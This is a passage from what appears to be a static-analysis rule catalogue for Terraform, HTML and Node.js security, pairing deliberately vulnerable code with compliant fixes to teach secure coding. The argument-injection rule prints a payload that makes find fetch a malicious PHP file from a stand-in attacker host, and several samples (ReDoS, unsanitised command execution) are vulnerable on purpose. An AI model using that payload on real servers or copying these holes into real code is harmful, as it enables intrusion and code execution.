    ports    = ["22"]
  }

  source_ranges = ["10.0.0.1/32"]
}

Resources

Documentation

Standards

terraform:S6364

Reducing the backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups allow to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient enough to be able to restore service in case of an incident.

Sensitive Code Example

For Amazon Relational Database Service clusters and instances:

resource "aws_db_instance" "example" {
  backup_retention_period = 2 # Sensitive
}

For Azure Cosmos DB accounts:

resource "azurerm_cosmosdb_account" "example" {
  backup {
    type = "Periodic"
    retention_in_hours = 8 # Sensitive
  }
}

Compliant Solution

For Amazon Relational Database Service clusters and instances:

resource "aws_db_instance" "example" {
  backup_retention_period = 5
}

For Azure Cosmos DB accounts:

resource "azurerm_cosmosdb_account" "example" {
  backup {
    type = "Periodic"
    retention_in_hours = 300
  }
}
terraform:S6281

By default S3 buckets are private, it means that only the bucket owner can access it.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies to be set on a S3 bucket the following settings can be configured:

  • BlockPublicAcls: to block or not public ACLs to be set to the S3 bucket.
  • IgnorePublicAcls: to consider or not existing public ACLs set to the S3 bucket.
  • BlockPublicPolicy: to block or not public policies to be set to the S3 bucket.
  • RestrictPublicBuckets: to restrict or not the access to the S3 endpoints of public policies to the principals within the bucket owner account.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • BlockPublicAcls to true to block new attempts to set public ACLs.
  • IgnorePublicAcls to true to block existing public ACLs.
  • BlockPublicPolicy to true to block new attempts to set public policies.
  • RestrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, the aws_s3_bucket_public_access_block is fully deactivated (nothing is blocked):

resource "aws_s3_bucket" "example" { # Sensitive: no Public Access Block defined for this bucket
  bucket = "example"
}

This aws_s3_bucket_public_access_block allows public ACL to be set:

resource "aws_s3_bucket" "example" {  # Sensitive
  bucket = "examplename"
}

resource "aws_s3_bucket_public_access_block" "example-public-access-block" {
  bucket = aws_s3_bucket.example.id

  block_public_acls       = false # should be true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

Compliant Solution

This aws_s3_bucket_public_access_block blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_public_access_block" "example-public-access-block" {
  bucket = aws_s3_bucket.example.id

  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

See

terraform:S6414

The Google Cloud audit logs service records administrative activities and accesses to Google Cloud resources of the project. It is important to enable audit logs to be able to investigate malicious activities in the event of a security incident.

Some project members may be exempted from having their activities recorded in the Google Cloud audit log service, creating a blind spot and reducing the capacity to investigate future security events.

Ask Yourself Whether

  • The members exempted from having their activity logged have high privileges.
  • Compliance rules require that audit log should be activated for all members.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to have a consistent audit logging policy for all project members and therefore not to create logging exemptions for certain members.

Sensitive Code Example

resource "google_project_iam_audit_config" "example" {
  project = data.google_project.project.id
  service = "allServices"
  audit_log_config {
    log_type = "ADMIN_READ"
    exempted_members = [ # Sensitive
      "user:rogue.administrator@gmail.com",
    ]
  }
}

Compliant Solution

resource "google_project_iam_audit_config" "example" {
  project = data.google_project.project.id
  service = "allServices"
  audit_log_config {
    log_type = "ADMIN_READ"
  }
}

See

terraform:S6378

Disabling Managed Identities can reduce an organization’s ability to protect itself against configuration faults and credentials leaks.

Authenticating via managed identities to an Azure resource solely relies on an API call with a non-secret token. The process is inner to Azure: secrets used by Azure are not even accessible to end-users.

In typical scenarios without managed identities, the use of credentials can lead to mistakenly leaving them in code bases. In addition, configuration faults may also happen when storing these values or assigning them permissions.

By transparently taking care of the Azure Active Directory authentication, Managed Identities allow getting rid of day-to-day credentials management.

Ask Yourself Whether

The resource:

  • Needs to authenticate to Azure resources that support Azure Active Directory (AAD).
  • Uses a different Access Control system that doesn’t guarantee the same security controls as AAD, or no Access Control system at all.

There is a risk if you answered yes to all of those questions.

Recommended Secure Coding Practices

Enable the Managed Identities capabilities of this Azure resource. If supported, use a System-Assigned managed identity, as:

  • It cannot be shared across resources.
  • Its life cycle is deeply tied to the life cycle of its Azure resource.
  • It provides a unique independent identity.

Alternatively, User-Assigned Managed Identities can also be used but don’t guarantee the properties listed above.

Sensitive Code Example

For Typical identity blocks:

resource "azurerm_api_management" "example" { # Sensitive, the identity block is missing
  name           = "example"
  publisher_name = "company"
}

For connections between Kusto Clusters and Azure Data Factory:

resource "azurerm_data_factory_linked_service_kusto" "example" {
  name                 = "example"
  use_managed_identity = false # Sensitive
}

Compliant Solution

For Typical identity blocks:

resource "azurerm_api_management" "example" {
  name           = "example"
  publisher_name = "company"

  identity {
    type = "SystemAssigned"
  }
}

For connections between Kusto Clusters and Azure Data Factory:

resource "azurerm_data_factory_linked_service_kusto" "example" {
  name                 = "example"
  use_managed_identity = true
}

See

terraform:S6410

Why is this an issue?

TLS configuration of Google Cloud load balancers is defined through SSL policies. There are three managed profiles to choose from: COMPATIBLE (default), MODERN and RESTRICTED:

  • The RESTRICTED profile relies only on secure cipher suites and should be used by applications that require to comply with the highest security standards.
  • The MODERN profile includes additional cipher suites that present security weaknesses like using the SHA1 algorithm for signing.
  • The COMPATIBLE profile offers the most common cipher suites and thus broader compatibility. Some of these use SHA1 or 3DES algorithms which are considered weak. Also, this profile includes cipher suites that rely on obsolete key-exchange mechanisms that don’t provide forward secrecy[https://en.wikipedia.org/wiki/Forward_secrecy] as a feature.

Noncompliant code example

resource "google_compute_ssl_policy" "example" {
  name            = "example"
  min_tls_version = "TLS_1_2"
  profile         = "COMPATIBLE" # Noncompliant
}

Compliant solution

resource "google_compute_ssl_policy" "example" {
  name            = "example"
  min_tls_version = "TLS_1_2"
  profile         = "RESTRICTED"
}

Resources

terraform:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independant OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

A public API that doesn’t have access control implemented:

resource "aws_api_gateway_method" "noncompliantapi" {
  authorization = "NONE" # Sensitive
  http_method   = "GET"
}

Compliant Solution

An API that implements AWS IAM permissions:

resource "aws_api_gateway_method" "compliantapi" {
  authorization = "AWS_IAM"
  http_method   = "GET"
}

See

terraform:S6413

Defining a short log retention duration can reduce an organization’s ability to backtrace the actions of malicious actors in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require traceability for a longer duration.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Setting log retention period to 14 days is the bare minimum. It’s recommended to increase it to 30 days or above.

Sensitive Code Example

For AWS Cloudwatch Logs:

resource "aws_cloudwatch_log_group" "example" {
  name = "example"
  retention_in_days = 3 # Sensitive
}

For Azure Firewall Policy:

resource "azurerm_firewall_policy" "example" {
  insights {
    enabled = true
    retention_in_days = 7 # Sensitive
  }
}

For Google Cloud Logging buckets:

resource "google_logging_project_bucket_config" "example" {
    project = var.project
    location = "global"
    retention_days = 7 # Sensitive
    bucket_id = "_Default"
}

Compliant Solution

For AWS Cloudwatch Logs:

resource "aws_cloudwatch_log_group" "example" {
  name = "example"
  retention_in_days = 30
}

For Azure Firewall Policy:

resource "azurerm_firewall_policy" "example" {
  insights {
    enabled = true
    retention_in_days = 30
  }
}

For Google Cloud Logging buckets:

resource "google_logging_project_bucket_config" "example" {
    project = var.project
    location = "global"
    retention_days = 30
    bucket_id = "_Default"
}
terraform:S6412

When object versioning for Google Cloud Storage (GCS) buckets is enabled, different versions of an object are stored in the bucket, preventing accidental deletion. A specific version can always be deleted when the generation number of an object version is specified in the request.

Object versioning cannot be enabled on a bucket with a retention policy. A retention policy ensures that an object is retained for a specific period of time even if a request is made to delete or replace it. Thus, a retention policy locks the single current version of an object in the bucket, which differs from object versioning where different versions of an object are retained.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable GCS bucket versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

Versioning is disabled by default:

resource "google_storage_bucket" "example" { # Sensitive
  name          = "example"
  location      = "US"
}

Compliant Solution

Versioning is enabled:

resource "google_storage_bucket" "example" {
  name          = "example"
  location      = "US"

  versioning {
    enabled = "true"
  }
}

See

terraform:S6379

Enabling Azure resource-specific admin accounts can reduce an organization’s ability to protect itself against account or service account thefts.

Full Administrator permissions fail to correctly separate duties and create potentially critical attack vectors on the impacted resources.

In case of abuse of elevated permissions, both the data on which impacted resources operate and their access traceability are at risk.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require this resource to disable its administrative accounts or permissions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable the administrative accounts or permissions in this Azure resource.

Sensitive Code Example

For Azure Batch Pools:

resource "azurerm_batch_pool" "example" {
  name = "sensitive"

  start_task {
    user_identity {
      auto_user {
        elevation_level = "Admin" # Sensitive
        scope = "Task"
      }
    }
  }
}

For Azure Container Registries:

resource "azurerm_container_registry" "example" {
  name = "example"
  admin_enabled = true # Sensitive
}

Compliant Solution

For Azure Batch Pools:

resource "azurerm_batch_pool" "example" {
  name = "example"

  start_task {
    user_identity {
      auto_user {
        elevation_level = "NonAdmin"
        scope = "Task"
      }
    }
  }
}

For Azure Container Registries:

resource "azurerm_container_registry" "exemple" {
  name = "example"
  admin_enabled = false
}

See

terraform:S6258

Disabling logging of this component can lead to missing traceability in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be monitored.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable the logging capabilities of this component. Depending on the component, new permissions might be required by the logging storage components.
You should consult the official documentation to enable logging for the impacted components. For example, AWS Application Load Balancer Access Logs require an additional bucket policy.

Sensitive Code Example

For Amazon S3 access requests:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

For Amazon API Gateway stages:

resource "aws_api_gateway_stage" "example" { # Sensitive
  xray_tracing_enabled = false # Sensitive
}

For Amazon MSK Broker logs:

resource "aws_msk_cluster" "example" {
  cluster_name           = "example"
  kafka_version          = "2.7.1"
  number_of_broker_nodes = 3

  logging_info {
    broker_logs { # Sensitive
      firehose {
        enabled = false
      }
      s3 {
        enabled = false
      }
    }
  }
}

For Amazon MQ Brokers:

resource "aws_mq_broker" "example" {
  logs {  # Sensitive
    audit   = false
    general = false
  }
}

For Amazon Amazon DocumentDB:

resource "aws_docdb_cluster" "example" { # Sensitive
  cluster_identifier = "example"
}

For Azure App Services:

resource "azurerm_app_service" "example" {
  logs {
    application_logs {
      file_system_level = "Off" # Sensitive
      azure_blob_storage {
        level = "Off"           # Sensitive
      }
    }
  }
}

For GCP VPC Subnetwork:

resource "google_compute_subnetwork" "example" { # Sensitive
  name          = "example"
  ip_cidr_range = "10.2.0.0/16"
  region        = "us-central1"
  network       = google_compute_network.example.id
}

For GCP SQL Database Instance:

resource "google_sql_database_instance" "example" {
  name = "example"

  settings { # Sensitive
    tier = "db-f1-micro"
    ip_configuration {
      require_ssl  = true
      ipv4_enabled = true
    }
  }
}

For GCP Kubernetes Engine (GKE) cluster:

resource "google_container_cluster" "example" {
  name               = "example"
  logging_service    = "none" # Sensitive
}

Compliant Solution

For Amazon S3 access requests:

resource "aws_s3_bucket" "example-logs" {
  bucket = "example_logstorage"
  acl    = "log-delivery-write"
}

resource "aws_s3_bucket" "example" {
  bucket = "example"

  logging { # AWS provider <= 3
      target_bucket = aws_s3_bucket.example-logs.id
      target_prefix = "log/example"
  }
}

resource "aws_s3_bucket_logging" "example" { # AWS provider >= 4
  bucket = aws_s3_bucket.example.id

  target_bucket = aws_s3_bucket.example-logs.id
  target_prefix = "log/example"
}

For Amazon API Gateway stages:

resource "aws_api_gateway_stage" "example" {
  xray_tracing_enabled = true

  access_log_settings {
    destination_arn = "arn:aws:logs:eu-west-1:123456789:example"
    format = "..."
  }
}

For Amazon MSK Broker logs:

resource "aws_msk_cluster" "example" {
  cluster_name           = "example"
  kafka_version          = "2.7.1"
  number_of_broker_nodes = 3

  logging_info {
    broker_logs {
      firehose   {
        enabled = false
      }
      s3 {
        enabled = true
        bucket  = "example"
        prefix  = "log/msk-"
      }
    }
  }
}

For Amazon MQ Brokers, enable audit or general:

resource "aws_mq_broker" "example" {
  logs {
    audit   = true
    general = true
  }
}

For Amazon Amazon DocumentDB:

resource "aws_docdb_cluster" "example" {
  cluster_identifier              = "example"
  enabled_cloudwatch_logs_exports = ["audit"]
}

For Azure App Services:

resource "azurerm_app_service" "example" {
 logs {
    http_logs {
      file_system {
        retention_in_days = 90
        retention_in_mb   = 100
      }
    }

 application_logs {
      file_system_level = "Error"
      azure_blob_storage {
        retention_in_days = 90
        level             = "Error"
      }
    }
  }
}

For GCP VPC Subnetwork:

resource "google_compute_subnetwork" "example" {
  name          = "example"
  ip_cidr_range = "10.2.0.0/16"
  region        = "us-central1"
  network       = google_compute_network.example.id

  log_config {
    aggregation_interval = "INTERVAL_10_MIN"
    flow_sampling        = 0.5
    metadata             = "INCLUDE_ALL_METADATA"
  }
}

For GCP SQL Database Instance:

resource "google_sql_database_instance" "example" {
  name             = "example"

  settings {
    ip_configuration {
      require_ssl  = true
      ipv4_enabled = true
    }
    database_flags {
      name  = "log_connections"
      value = "on"
    }
    database_flags {
      name  = "log_disconnections"
      value = "on"
    }
    database_flags {
      name  = "log_checkpoints"
      value = "on"
    }
    database_flags {
      name  = "log_lock_waits"
      value = "on"
    }
  }
}

For GCP Kubernetes Engine (GKE) cluster:

resource "google_container_cluster" "example" {
  name               = "example"
  logging_service    = "logging.googleapis.com/kubernetes"
}

See

terraform:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sqs_queue:

resource "aws_sqs_queue" "queue" {  # Sensitive, encryption disabled by default
  name = "sqs-unencrypted"
}

Compliant Solution

For aws_sqs_queue:

resource "aws_sqs_queue" "queue" {
  name = "sqs-encrypted"
  kms_master_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6252

S3 buckets can be in three states related to versioning:

  • unversioned (default one)
  • enabled
  • suspended

When the S3 bucket is unversioned or has versioning suspended it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

Versioning is disabled by default:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

Compliant Solution

Versioning is enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example-versioning" {
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
  }
}

Versioning is enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  versioning {
    enabled = true
  }
}

See

terraform:S6255

When S3 buckets versioning is enabled it’s possible to add an additional authentication factor before being allowed to delete versions of an object or changing the versioning state of a bucket. It prevents accidental object deletion by forcing the user sending the delete request to prove that he has a valid MFA device and a corresponding valid token.

Ask Yourself Whether

  • The S3 bucket stores sensitive information that is required to be preserved on the long term.
  • The S3 bucket grants delete permission to many users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 MFA delete, note that:

  • MFA delete can only be enabled with the AWS CLI or API and with the root account.
  • To delete an object version, the API should be used with the x-amz-mfa header.
  • The API request, with the x-amz-mfa header, can only be used in HTTPS.

Sensitive Code Example

A versioned S3 bucket does not have MFA delete enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"

  versioning {
    enabled = true
  }
}

A versioned S3 bucket does not have MFA delete enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example" { # Sensitive
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
  }
}

Compliant Solution

MFA delete is enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  versioning {
    enabled = true
    mfa_delete = true
  }
}

MFA delete is enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example" {
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
    mfa_delete = "Enabled"
  }
  mfa = "${var.MFA}"
}

See

terraform:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_efs_file_system:

resource "aws_efs_file_system" "fs" {  # Sensitive, encryption disabled by default
}

Compliant Solution

For aws_efs_file_system:

resource "aws_efs_file_system" "fs" {
  encrypted = true
}

See

terraform:S6375

Azure Active Directory offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Application Administrator
  • Authentication Administrator
  • Cloud Application Administrator
  • Global Administrator
  • Groups Administrator
  • Helpdesk Administrator
  • Password Administrator
  • Privileged Authentication Administrator
  • Privileged Role Administrator
  • User Administrator

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Global Administrator roles to less than five people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.

Sensitive Code Example

resource "azuread_directory_role" "example" {
  display_name = "Privileged Role Administrator" # Sensitive
}

resource "azuread_directory_role_member" "example" {
  role_object_id   = azuread_directory_role.example.object_id
  member_object_id = data.azuread_user.example.object_id
}

Compliant Solution

resource "azuread_directory_role" "example" {
  display_name = "Usage Summary Reports Reader"
}

resource "azuread_directory_role_member" "example" {
  role_object_id   = azuread_directory_role.example.object_id
  member_object_id = data.azuread_user.example.object_id
}

See

Web:AvoidHtmlCommentCheck

Using HTML-style comments in a page that will be generated or interpolated server-side before being served to the user increases the risk of exposing data that should be kept private. For instance, a developer comment or line of debugging information that’s left in a page could easily (and has) inadvertently expose:

  • Version numbers and host names
  • Full, server-side path names
  • Sensitive user data

Every other language has its own native comment format, thus there is no justification for using HTML-style comments in anything other than a pure HTML or XML file.

Ask Yourself Whether

  • The comment contains sensitive information.
  • The comment can be removed.

Recommended Secure Coding Practices

It is recommended to remove the comment or change its style so that it is not output to the client.

Sensitive Code Example

  <%
      out.write("<!-- ${username} -->");  // Sensitive
  %>
      <!-- <% out.write(userId) %> -->  // Sensitive
      <!-- #{userPhone} -->  // Sensitive
      <!-- ${userAddress} --> // Sensitive

      <!-- Replace 'world' with name --> // Sensitive
      <h2>Hello world!</h2>

Compliant Solution

      <%-- Replace 'world' with name --%>  // Compliant
      <h2>Hello world!</h2>

See

Web:S5148

A newly opened window having access back to the originating window could allow basic phishing attacks (the window.opener object is not null and thus window.opener.location can be set to a malicious website by the opened page).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URL.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+ or Safari 12.1+ target=_blank on anchors implies rel=noopener which make the protection enabled by default.

Sensitive Code Example

<a href="http://example.com/dangerous" target="_blank"> <!-- Sensitive -->

<a href="{{variable}}" target="_blank"> <!-- Sensitive -->

Compliant Solution

To prevent pages from abusing window.opener, use rel=noopener on <a href=> to force its value to be null on the opened pages.

<a href="http://petssocialnetwork.io" target="_blank" rel="noopener"> <!-- Compliant -->

Exceptions

No Issue will be raised when href contains a hardcoded relative url as there it has less chances of being vulnerable. An url is considered hardcoded and relative if it doesn’t start with http:// or https://, and if it does not contain any of the characters {}$()[]

<a href="internal.html" target="_blank" > <!-- Compliant -->

See

Web:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add quiet malware that monitors users' session and capture sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface, or otherwise affect the general availability of the application.
  • mine cryptocurrencies in the background.

Likewise, a compromised software piece that would be deployed on a server-side application could badly affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • Use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
Especially, integrity checks will allow for identifying an artifact replaced by malware on the publication website or that was legitimately changed by its author, in a more benign scenario.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution. It does ensure that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

<script
    src="https://cdn.example.com/latest/script.js"
></script> <!-- Sensitive -->

Compliant Solution

<script
    src="https://cdn.example.com/v5.3.6/script.js"
    integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
></script>

See

jssecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Node.js

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

const express = require('express');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(req.query.regex); // Noncompliant

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

Compliant solution

const express = require('express');
const escapeStringRegexp = require('escape-string-regexp');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(escapeStringRegexp(req.query.regex));

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, the escapeStringRegexp function provided by the npm package escape-string-regexp escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

jssecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command still might be influenced in a way that allows to expand access, for example, execution of arbitrary commands. The security of the application depends on the behavior of the application that is executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary argument to a system binary call. Depending on the command the parameters are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Express.js

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

async function (req, res) {
    await execa.command('find /tmp/images/' + req.query.id); // Noncompliant
}

Compliant solution

async function (req, res) {
    if (req.query.file && req.query.file.match(/^[A-Z]+$/i)) {
        await execa('find', ['/tmp/images/' + req.query.file]);
    } else {
        await execa('find', ['/tmp/images/']);
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When this is not possible, strict measures should be applied to ensure a secure implementation.

